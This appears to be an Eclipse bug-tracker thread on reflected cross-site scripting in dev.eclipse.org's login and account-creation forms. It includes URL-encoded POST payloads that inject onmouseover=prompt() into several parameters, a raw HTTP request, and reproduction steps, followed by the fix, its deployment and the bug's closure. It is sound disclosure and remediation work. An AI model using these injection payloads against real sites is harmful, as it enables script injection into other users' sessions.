Community
Participate
Working Groups
you don't filtrated this parameters: -------------------------------------------------------------------------- password Example vuln. POST-DATA password=g00dPa%2524%2524w0rD%22%20onmouseover%3dprompt(948410)%20bad%3d%22&remember=1&submit=Login&takemeback=https://dev.eclipse.org/site_login/&username=qumxeicy -------------------------------------------------------------------------- takemeback Example vuln. POST-DATA password=g00dPa%24%24w0rD&remember=1&submit=Login&takemeback=https://dev.eclipse.org/site_login/%22%20onmouseover%3dprompt(998306)%20bad%3d%22&username=dewoqurm -------------------------------------------------------------------------- username Example vuln. POST-DATA password=g00dPa%24%24w0rD&remember=1&submit=Login&takemeback=https://dev.eclipse.org/site_login/&username=dewoqurm%22%20onmouseover%3dprompt(980340)%20bad%3d%22 -------------------------------------------------------------------------- [ We are running these parameters though an XSS regexp; however, as the above values are urlencoded, they are getting through ] 2. this vuln. have too in next page https://dev.eclipse.org/site_login/createaccount.php vuln. parameter : ------------------------------- password1 agree=1&fname=jalgyxyh&lname=jalgyxyh&password1=g00dPa%2524%2524w0rD%22%20onmouseover%3dprompt(937540)%20bad%3d%22&password2=g00dPa%24%24w0rD&skill=1&stage=create&submit=Create%20account%21&username=jalgyxyh ------------------------------- password2 agree=1&fname=ykcfhlfm&lname=ykcfhlfm&password1=g00dPa%24%24w0rD&password2=g00dPa%2524%2524w0rD%22%20onmouseover%3dprompt(991996)%20bad%3d%22&skill=1&stage=create&submit=Create%20account%21&username=ykcfhlfm ------------------------------- username agree=1&fname=dlqvrbjk&lname=dlqvrbjk&password1=g00dPa%24%24w0rD&password2=g00dPa%24%24w0rD&skill=1&stage=create&submit=Create%20account%21&username=dlyhwydp%22%20onmouseover%3dprompt(942734)%20bad%3d%22 [ As above... we need to either strengthen our XSS regexp, or urldecode() values before regexp ] 3. POST /site_login/ HTTP/1.1 Content-Length: 152 Content-Type: application/x-www-form-urlencoded Referer: https://dev.eclipse.org/ Cookie: PHPSESSID=h9uih2i4072vi16sdctt6uiq0km39tn0 Host: dev.eclipse.org Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */* password=g00dPa%24%24w0rD&remember=1%20onmouseover%3dprompt(992892)%20y%3d&submit=Login&takemeback=https://dev.eclipse.org/site_login/&username=kfrfttat vuln. remember parameter . Vahagn Vardanyan special for eclipse :) [ Indeed, the "remember" parameter gets passed onto the form without sanitization ]
From the security inbox: Reflected XSS on site_login: Method: POST URL: https://dev.eclipse.org/site_login/ Param: Username or Password Payload: x" onmouseover=prompt(5)>" Proof: Attachments Replicate: Open firefox Go to eclipse login page from above URL Copy the paylod into the username/password fields Hit Submit On the following page, hover your mouse over the username/password boxes -M.
(In reply to Eclipse Webmaster from comment #1) > From the security inbox: > > Reflected XSS on site_login: > > Method: POST > URL: https://dev.eclipse.org/site_login/ > Param: Username or Password > Payload: x" onmouseover=prompt(5)>" > > Proof: > Attachments > > Replicate: > Open firefox > Go to eclipse login page from above URL > Copy the paylod into the username/password fields > Hit Submit > On the following page, hover your mouse over the username/password boxes > > -M. I have a patch ready for review: https://git.eclipse.org/r/34074 After a quick talk with Matt and Eddie this morning, we've decided not to return a default value for passwords. I am using filter_var to filter out the default values. http://php.net/manual/en/filter.filters.sanitize.php
The patch was committed. Webmaster's, please update dev.eclipse.org when you get the chance.
dev seems to be up-to-date.
(In reply to Denis Roy from comment #4) > dev seems to be up-to-date. Removing security flag. Closing bug.